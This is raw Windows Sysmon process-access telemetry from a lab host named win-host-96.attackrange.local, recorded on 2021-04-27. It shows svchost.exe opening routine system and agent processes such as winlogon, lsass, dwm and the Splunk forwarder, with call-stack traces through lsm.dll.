12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4AE-6086-4F01-00000000BB01}2856C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292389Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292388Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4AC-6086-4701-00000000BB01}3580C:\Windows\system32\dwm.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292387Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4AB-6086-4401-00000000BB01}3848C:\Windows\system32\winlogon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292386Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D14B-6086-D000-00000000BB01}3836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292385Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292384Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D13E-6086-9D00-00000000BB01}1728C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292383Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292382Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D13C-6086-8E00-00000000BB01}3436C:\Windows\System32\msdtc.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292381Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C5-6086-3C00-00000000BB01}1592C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292380Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C4-6086-3200-00000000BB01}2924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292379Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-2700-00000000BB01}2720C:\Windows\system32\wbem\unsecapp.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292378Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292377Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1D00-00000000BB01}1976C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292376Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1C00-00000000BB01}1940C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292375Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1B00-00000000BB01}1932C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292374Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1900-00000000BB01}1844C:\Windows\System32\spoolsv.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292373Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1800-00000000BB01}1716C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292372Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1700-00000000BB01}1348C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292371Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1600-00000000BB01}1168C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292370Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1500-00000000BB01}1104C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292369Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1400-00000000BB01}368C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292368Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1300-00000000BB01}344C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292367Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1200-00000000BB01}92C:\Windows\system32\dwm.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292366Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292365Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292364Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292363Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0E00-00000000BB01}920C:\Windows\system32\LogonUI.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292362Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0D00-00000000BB01}792C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292361Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292360Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C1-6086-0900-00000000BB01}572C:\Windows\system32\winlogon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292359Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292358Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-1000-00000000BB01}944716C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+2870|c:\windows\system32\themeservice.dll+26d8|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292357Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292356Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.394{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292355Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 